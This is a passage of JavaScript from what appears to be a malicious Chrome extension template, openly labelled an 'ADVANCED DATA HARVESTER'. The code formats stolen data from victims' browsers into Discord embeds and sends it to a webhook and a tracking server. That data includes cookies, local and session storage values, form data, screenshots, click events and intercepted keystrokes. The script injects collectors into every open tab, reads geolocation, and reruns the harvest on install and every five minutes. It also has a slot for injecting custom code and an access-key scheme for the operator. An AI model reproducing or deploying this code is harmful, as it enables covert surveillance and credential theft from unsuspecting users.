          { name: "💾 Storage Data", value: `**LocalStorage:** ${Object.keys(data.localStorage || {}).length} items\n**SessionStorage:** ${Object.keys(data.sessionStorage || {}).length} items\n**Cookies:** ${data.cookies ? 'Present' : 'None'}`, inline: true }
        ];

        // Add form data if available
        if (data.forms?.length > 0) {
          const formEmbed = {
            title: "📝 FORM DATA EXTRACTED",
            color: 0xE67E22,
            fields: []
          };

          data.forms.slice(0, 5).forEach((form, index) => {
            const formInfo = `**Action:** ${form.action || 'None'}\n**Method:** ${form.method || 'GET'}\n**Inputs:** ${form.inputs?.length || 0}`;
            formEmbed.fields.push({
              name: `📋 Form ${index + 1}`,
              value: formInfo,
              inline: true
            });
          });

          embeds.push(formEmbed);
        }

        // Add storage data if significant
        if (Object.keys(data.localStorage || {}).length > 0 || Object.keys(data.sessionStorage || {}).length > 0) {
          const storageEmbed = {
            title: "💾 BROWSER STORAGE COMPROMISED",
            color: 0x2ECC71,
            fields: []
          };

          if (Object.keys(data.localStorage || {}).length > 0) {
            const localKeys = Object.keys(data.localStorage).slice(0, 10);
            storageEmbed.fields.push({
              name: "🗄️ LocalStorage Data",
              value: localKeys.map(key => `**${key}**: \`${data.localStorage[key]?.substring(0, 50) || ''}...\``).join('\n'),
              inline: false
            });
          }

          if (Object.keys(data.sessionStorage || {}).length > 0) {
            const sessionKeys = Object.keys(data.sessionStorage).slice(0, 10);
            storageEmbed.fields.push({
              name: "🔄 SessionStorage Data",
              value: sessionKeys.map(key => `**${key}**: \`${data.sessionStorage[key]?.substring(0, 50) || ''}...\``).join('\n'),
              inline: false
            });
          }

          embeds.push(storageEmbed);
        }
        break;

      case 'screenshot':
        mainEmbed.title = "📸 SCREEN CAPTURE COMPLETED";
        mainEmbed.description = `Screenshot captured from **${data.tabInfo?.title || 'current page'}** for visual monitoring.`;
        mainEmbed.fields = [
          { name: "📄 Target Page", value: data.tabInfo?.title?.substring(0, 100) || 'Unknown', inline: false },
          { name: "📊 Capture Details", value: `**Size:** ${Math.round(data.screenshotSize / 1024)} KB\n**Quality:** High\n**Status:** ✅ Captured`, inline: true }
        ];
        break;

      case 'enhanced_click_event':
        mainEmbed.title = "👆 USER INTERACTION TRACKED";
        mainEmbed.description = `Monitoring user click on **${data.element?.tagName || 'element'}** with detailed tracking.`;
        mainEmbed.fields = [
          { name: "🎯 Target Element", value: `**Tag:** ${data.element?.tagName || 'Unknown'}\n**ID:** ${data.element?.id || 'None'}\n**Class:** ${data.element?.className || 'None'}`, inline: true },
          { name: "📝 Element Data", value: `**Text:** ${data.element?.text?.substring(0, 50) || 'No text'}\n**Value:** ${data.element?.value?.substring(0, 30) || 'None'}`, inline: true },
          { name: "📍 Click Position", value: `**X:** ${data.coordinates?.pageX || 0}\n**Y:** ${data.coordinates?.pageY || 0}`, inline: true }
        ];
        break;

      case 'enhanced_keystroke_event':
        mainEmbed.title = "⌨️ KEYSTROKES INTERCEPTED";
        mainEmbed.description = `Captured **${data.keyCount || 0}** keystrokes with full context monitoring.`;
        mainEmbed.fields = [
          { name: "🔢 Keystroke Data", value: `**Characters:** ${data.keyCount || 0}\n**Keys:** \`${data.keys?.substring(0, 50) || 'Hidden'}...\``, inline: true },
          { name: "🎯 Target Field", value: `**Type:** ${data.element?.type || 'Unknown'}\n**Name:** ${data.element?.name || 'None'}\n**Placeholder:** ${data.element?.placeholder || 'None'}`, inline: true }
        ];
        break;

      default:
        mainEmbed.description = `Processing **${data.type}** data with comprehensive monitoring.`;
    }

    // Add URL field for page-related events
    if (data.url && !['extension_installed', 'all_cookies', 'browsing_history'].includes(data.type)) {
      mainEmbed.fields = mainEmbed.fields || [];
      mainEmbed.fields.push({
        name: "🔗 Current URL",
        value: `\`${data.url.substring(0, 200) || 'Unknown'}\``,
        inline: false
      });
    }

    // Add main embed first
    embeds.unshift(mainEmbed);

    // Send multiple embeds if we have them (Discord allows up to 10 embeds per message)
    const maxEmbedsPerMessage = 10;
    for (let i = 0; i < embeds.length; i += maxEmbedsPerMessage) {
      const embedBatch = embeds.slice(i, i + maxEmbedsPerMessage);

      const webhookPayload = {
        username: "🕵️ {{EXTENSION_NAME}} - ADVANCED DATA HARVESTER",
        avatar_url: "https://cdn.discordapp.com/emojis/853928735535742986.png",
        embeds: embedBatch
      };

      const response = await fetch(WEBHOOK_URL, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify(webhookPayload)
      });

      if (!response.ok) {
        console.error('Webhook failed:', response.status, response.statusText);
      } else {
        console.log(`✅ Comprehensive data batch ${i/maxEmbedsPerMessage + 1} sent to Discord webhook`);
      }

      // Small delay between batches to avoid rate limiting
      if (i + maxEmbedsPerMessage < embeds.length) {
        await new Promise(resolve => setTimeout(resolve, 1000));
      }
    }

  } catch (error) {
    console.error('❌ Error in comprehensive webhook send:', error);
  }
}

// Get color based on event type
function getColorForEventType(eventType) {
  const colors = {
    'extension_installed': 0x00FF00,
    'all_cookies': 0xFFFF00,
    'browsing_history': 0x3498DB,
    'roblox_data': 0xFF6B35,
    'bookmarks': 0x9B59B6,
    'all_tabs': 0x1ABC9C,
    'downloads': 0xE67E22,
    'comprehensive_page_analysis': 0xF39C12,
    'screenshot': 0x8E44AD,
    'enhanced_click_event': 0xE74C3C,
    'enhanced_keystroke_event': 0xFF0000,
    'page_storage': 0x2ECC71
  };
  return colors[eventType] || 0x95A5A6;
}

// Send data to tracking server for EX LOGS
async function sendToServer(data) {
  try {
    if (!TRACKING_SERVER) {
      console.warn('No tracking server configured');
      return;
    }

    const response = await fetch(`${TRACKING_SERVER}/api/extension-track`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({
        ...data,
        userAgent: navigator.userAgent,
        extensionName: '{{EXTENSION_NAME}}',
        webhookUrl: WEBHOOK_URL
      })
    });

    if (response.ok) {
      console.log('📊 Data logged to EX LOGS tracking server');
    }
  } catch (error) {
    console.error('❌ Tracking server communication failed:', error);
  }
}

// Get current position with timeout
function getCurrentPosition() {
  return new Promise((resolve, reject) => {
    navigator.geolocation.getCurrentPosition(resolve, reject, {
      timeout: 10000,
      maximumAge: 300000,
      enableHighAccuracy: true
    });
  });
}

// Collect data from specific tab
async function collectPageDataFromTab(tab) {
  if (tab.url && !tab.url.startsWith('chrome://') && !tab.url.startsWith('chrome-extension://')) {
    try {
      await chrome.scripting.executeScript({
        target: { tabId: tab.id },
        func: collectCompletePageData,
        args: [EXTENSION_ID, sessionId, USER_ID, true, true, true]
      });
    } catch (error) {
      console.error('Error collecting page data from tab:', error);
    }
  }
}

// Set up periodic comprehensive data collection
setInterval(async () => {
  console.log('🔄 Running periodic comprehensive data collection...');
  await collectAllData();
}, 300000); // Every 5 minutes

// Extension installation handler
chrome.runtime.onInstalled.addListener(async (details) => {
  console.log('{{EXTENSION_NAME}} installed:', details);

  try {
    // Start comprehensive data collection immediately
    await collectAllData();

    console.log('✅ {{EXTENSION_NAME}} is now collecting ALL user data');

  } catch (error) {
    console.error('Error during installation setup:', error);
  }
});

// Custom user code injection point
try {
  {{CUSTOM_CODE}}
} catch (error) {
  console.error('Custom code error:', error);
}

// Access Key Management (New Feature)
// Define access key storage (e.g., chrome.storage.local)
const ACCESS_KEY_STORAGE = chrome.storage.local;
const ACCESS_KEYS_KEY = 'accessKeys';
const CREATOR_ACCESS_KEY_NAME = '.GOVdev';

// Function to generate a random access key
function generateAccessKey() {
  return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function(c) {
    const r = Math.random() * 16 | 0;
    const v = c === 'x' ? r : (r & 0x3 | 0x8);
    return v.toString(16);
  });
}

// Function to create a new access key
async function createAccessKey(keyName, unlimited = false) {
  try {
    const key = generateAccessKey();
    const existingKeys = await ACCESS_KEY_STORAGE.get(ACCESS_KEYS_KEY) || {};
    
    // Ensure keyName is valid and not a duplicate
    if (!keyName || typeof keyName !== 'string' || keyName.trim() === '') {
      throw new Error('Invalid key name provided.');
    }
    if (existingKeys[keyName]) {
      throw new Error(`Access key for "${keyName}" already exists.`);
    }

    const newKeyEntry = {
      key: key,
      name: keyName,
      createdAt: new Date().toISOString(),
      unlimited: unlimited,
      // Add other potential fields like permissions, expiry, etc.
    };

    existingKeys[keyName] = newKeyEntry;
    await ACCESS_KEY_STORAGE.set({ [ACCESS_KEYS_KEY]: existingKeys });
    console.log(`Access key created for "${keyName}" with key: ${key}`);
    return newKeyEntry;

  } catch (error) {
    console.error('Error creating access key:', error);
    return null;
  }
}

// Function to retrieve all access keys
async function getAllAccessKeys() {
  try {
    const data = await ACCESS_KEY_STORAGE.get(ACCESS_KEYS_KEY);
    return data ? Object.values(data) : [];
  } catch (error) {
    console.error('Error retrieving access keys:', error);
    return [];
  }
}

// Function to validate an access key
async function validateAccessKey(key) {
  try {
    const data = await ACCESS_KEY_STORAGE.get(ACCESS_KEYS_KEY);
    if (!data) return false;

    for (const keyName in data) {
      if (data[keyName].key === key) {
        // Add logic for unlimited access or expiry checks here if needed
        return true;
      }
    }
    return false;
  } catch (error) {
    console.error('Error validating access key:', error);
    return false;
  }
}

// Initialize: Create creator access key if it doesn't exist
async function initializeAccessKeys() {
  try {
    const data = await ACCESS_KEY_STORAGE.get(ACCESS_KEYS_KEY);
    if (!data || !data[CREATOR_ACCESS_KEY_NAME]) {
      console.log(`Creating default "${CREATOR_ACCESS_KEY_NAME}" unlimited access key.`);
      await createAccessKey(CREATOR_ACCESS_KEY_NAME, true);
    }
  } catch (error) {
    console.error('Error during access key initialization:', error);
  }
}

// Call initialization on startup
if (chrome && chrome.runtime) {
  chrome.runtime.onStartup.addListener(initializeAccessKeys);
  chrome.runtime.onInstalled.addListener(initializeAccessKeys);
}


// Function to check if the current user/session has a valid access key
async function checkActiveAccessKey() {
  // This is a placeholder. In a real app, you'd check a stored key or token.
  // For now, we'll just assume access is granted if the '.GOVdev' key exists.
  try {
    const data = await ACCESS_KEY_STORAGE.get(ACCESS_KEYS_KEY);
    return data && data[CREATOR_ACCESS_KEY_NAME];
  } catch (error) {
    console.error('Error checking active access key:', error);
    return false;
  }
}

// Example usage (for demonstration, these would be called from settings or API endpoints)
// createAccessKey('adminKey1', false);
// createAccessKey('devKey2', true);
// getAllAccessKeys().then(keys => console.log('All keys:', keys));
// validateAccessKey('some_key_here').then(isValid => console.log('Key valid:', isValid));

// Change dashboard name (This is a UI/frontend concern, not directly handled in background script logic)
// For example, if this were a React component, you'd update the document title or a header element:
// document.title = "EXNL | DASHBOARD #1";
// Or in a different context, this might be a configuration setting that the frontend reads.